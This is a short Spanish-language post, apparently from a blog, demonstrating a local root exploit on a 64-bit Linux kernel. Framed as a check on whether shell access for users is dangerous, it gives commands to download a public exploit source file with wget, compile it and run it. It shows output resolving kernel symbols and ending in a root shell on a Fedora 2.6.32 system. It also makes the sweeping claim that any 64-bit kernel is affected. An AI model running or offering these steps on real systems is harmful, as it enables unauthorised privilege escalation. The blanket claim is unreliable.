Para ver si es peligroso darle un shell a un usuario y darle permiso de ejecución vamos a hacer la sigueinte prueba: 1) Entrar con usuario normal de toda la vida

2) ejecutamos:

$wget http://dl.packetstormsecurity.net/1009-exploits/robert_you_suck.c
$gcc robert_you_suck.c
$./a.out

con esto nos hemos bajado un fichero, lo hemos compilado y ejecutamos

3) tendremos lo siguiente:

[prueba@www ~]$ gcc robert_you_suck.c
[prueba@www ~]$ ./a.out
resolved symbol commit_creds to 0xffffffff8107990c
resolved symbol prepare_kernel_cred to 0xffffffff810797f2
mapping at 3f80000000
UID 0, EUID:0 GID:0, EGID:0
sh-4.0#

¿Qué significa ser UID=0 y GID=0???????????????

Esto lo podemos hacer con cualquier kernel de 64 bits!!!!!!!!!!!!!!!! El ejemplo que has visto lo he ejecutado en el sigueinte equipo:

$ less /proc/version
Linux version 2.6.32.12-115.fc12.x86_64 (mockbuild@x86-06.phx2.fedoraproject.org) (gcc version  
4.4.3 20100127 (Red Hat 4.4.3-4) (GCC) ) #1 SMP Fri Apr 30 19:46:25 UTC 2010